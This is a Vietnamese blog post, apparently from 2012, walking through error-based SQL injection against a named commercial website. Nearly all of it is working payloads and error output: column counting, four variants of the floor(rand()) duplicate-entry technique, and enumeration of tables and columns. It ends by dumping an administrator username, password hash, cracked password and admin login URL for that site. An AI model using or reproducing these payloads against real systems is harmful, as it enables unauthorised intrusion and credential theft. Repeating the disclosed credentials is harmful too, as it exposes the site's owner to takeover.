Trang chủ
»
SQL Injection
» Một Số Lưu Ý Khi Khai Thác SQL
2 thg 7, 2012
Một Số Lưu Ý Khi Khai Thác SQL
Hướng Dẫn Một Số Cách Khai Thác Khi Union Xuất Hiện Lỗi - ducdung.08clcLink bị lỗi: http://thuonghieudatviet.com.vn/sites/index.php?id=126’
Invalid query: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
I- Tìm Số trường cột
http://thuonghieudatviet.com.vn/sites/index.php?id=126 order by 5-- -
Website Vẫn bình thường
http://thuonghieudatviet.com.vn/sites/index.php?id=126 order by 6-- -
Đã xuất hiện lỗi nè: Invalid query: Unknown column '6' in 'order clause'
¬số cột: 6-1 =5
II- Union để tìm vị trí cột bị lỗi[/COLOR]
http://thuonghieudatviet.com.vn/sites/index.php?id=126 UNION SELECT 1,2,3,4,5-- -
Hix, nó không cho “union select” rồi:
Invalid query: The used SELECT statements have a different number of columns
III- Một số cách khắc phục
Cách 1:
http://thuonghieudatviet.com.vn/sites/index.php?id=126 And(Select 1 From(Select Count(*),Concat((Select Concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f)),floor(rAnd(0)*2))kechocgianvn From Information_Schema.columns Group By kechocgianvn)vnhack)
Cách 2
http://thuonghieudatviet.com.vn/sites/index.php?id=126 And(Select 1 From(Select Count(*),Concat((Select substr(Group_Concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f),1,136)From tbl_user),floor(rAnd(0)*2))kechocgianvn From Information_Schema.columns Group By kechocgianvn)vnhack)
Cách 3:
http://thuonghieudatviet.com.vn/sites/index.php?id=126 and (select 1 from (select count(*),concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) from (select 1 union select 2 union select 3)kechocgianvn group by 2)vnhack)
Cách 4:
http://thuonghieudatviet.com.vn/sites/index.php?id=126 or 1 group by concat(0x2f,version(),0x2f,database(),0x2f,user(),0x2f,floor(rand(0)*2)) having min(1) or 1-- -
Tất cả các cách trên đều cho ra thông tin cần tìm:
Invalid query: Duplicate entry '/5.0.92-community/thuonghi_thdv/thuonghi_thdv@localhost/1' for key 1
IV- Exploiting tables_name
Tôi sẽ khai thác cách 1 các còn lại những cách khác các bạn làm tương tự nhé:
http://thuonghieudatviet.com.vn/sites/index.php?id=126 And(Select 1 From(Select Count(*),Concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rAnd(0)*2))kechocgianvn From Information_Schema.columns Group By kechocgianvn)vnhack)
Xuất hiện, tên bẳng đầu tiên: “tbl_user” không có số 1 nhé.
Invalid query: Duplicate entry 'tbl_user1' for key 1
Để lấy exploits các bảng tiếp theo bạn thay limit 0,1 thành limit 1,2 rồi limit 2,1 rồi limit 3,1…..Cho tới tên bẳng mà mình cần khai thác.
V – Exploiting columns_name
http://thuonghieudatviet.com.vn/sites/index.php?id=126 And(Select 1 From(Select Count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572 limit 0,1),floor(rAnd(0)*2))kechocgianvn From Information_Schema.columns Group By kechocgianvn)vnhack)
Đã xuât hiện côt đầu tiên: “id”
Invalid query: Duplicate entry 'id1' for key 1
Tiếp tục lấy cột thứ 2:
http://thuonghieudatviet.com.vn/sites/index.php?id=126 And(Select 1 From(Select Count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572 limit 1,1),floor(rAnd(0)*2))kechocgianvn From Information_Schema.columns Group By kechocgianvn)vnhack)
Ok, ta đã có column: “username”
Invalid query: Duplicate entry 'username1' for key 1
Tiếp tục lấy cột thứ 3:
http://thuonghieudatviet.com.vn/sites/index.php?id=126 And(Select 1 From(Select Count(*),Concat((select column_name from information_schema.columns where table_schema=database() and table_name=0x74626c5f75736572 limit 2,1),floor(rAnd(0)*2))kechocgianvn From Information_Schema.columns Group By kechocgianvn)vnhack)
Ta được column: “password”
Invalid query: Duplicate entry 'password1' for key 1
VI – Khai thác thông tin username và password
http://thuonghieudatviet.com.vn/sites/index.php?id=126 And(Select 1 From(Select Count(*),Concat((select concat(0x2f,username,0x2f,password,0x2f) from tbl_user limit 0,1),floor(rAnd(0)*2))kechocgianvn From Information_Schema.columns Group By kechocgianvn)vnhack)
Ok, Xuât hiện thông tin cần khai thác:
Invalid query: Duplicate entry '/dk@@86/e50de53e74fb5c52efcf2feda8159c24/1' for key 1
VII - Giải Mã password và tìm link admin
Username: dk@@86
Password: (*&^%$#@! (theo md5)
Iink admin: http://thuonghieudatviet.com.vn/administrator/index.php
by:ducdung.08clc
Không có nhận xét nào:
Đăng nhận xét